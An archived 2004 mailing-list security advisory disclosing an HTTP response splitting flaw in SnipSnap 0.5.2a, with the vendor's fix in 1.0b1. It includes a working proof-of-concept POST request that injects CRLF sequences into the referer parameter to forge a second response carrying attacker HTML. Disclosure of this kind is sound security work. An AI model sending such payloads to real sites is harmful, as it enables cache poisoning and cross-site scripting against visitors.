<<< Date Index >>>     <<< Thread Index >>>

ADVISORY: http response splitting in snipsnap



ADVISORY
 
Author: Maestro (me!)

Date: 14-SEP-04
 
Vendor: SnipSnap (www.snipsnap.org)
 
Product: SnipSnap 0.5.2a

Product description (from vendor website):
SnipSnap is a free and easy to install weblog and wiki tool written in Java.

Problem: Http response splitting (web cache poisoning, xss, 
yadayadayada) - 

http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
 
Exploit:

POST /exec/authenticate HTTP/1.0
Host: cringe.dnsalias.com
Content-Type: application/x-www-form-urlencoded
Content-length: 197

referer=abc%0d%0aConnection:%20keep-alive%0d%0aContent-Length:%200%0d%0a%0d%
0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:20%0d%
0a%0d%0a{html}0wned!!{/html}&cancel=cancel


(replace curly braces with lessthan and greaterthan)

Vendor status: vendor fixed in version 1.0B1. From vendor website:
Tuesday, 14. September 2004
SnipSnap 1.0b1 (uttoxeter) released 
SnipSnap version 1.0b1 has just been released. This release was necessary due 
to the demand to get updates from 0.5.2a and a security issue know as HTTP 
response splitting found by someone called Maestro De-Seguridad.
-- 
_______________________________________________
Find what you are looking for with the Lycos Yellow Pages
http://r.lycos.com/r/yp_emailfooter/http://yellowpages.lycos.com/default.asp?SRC=lycos10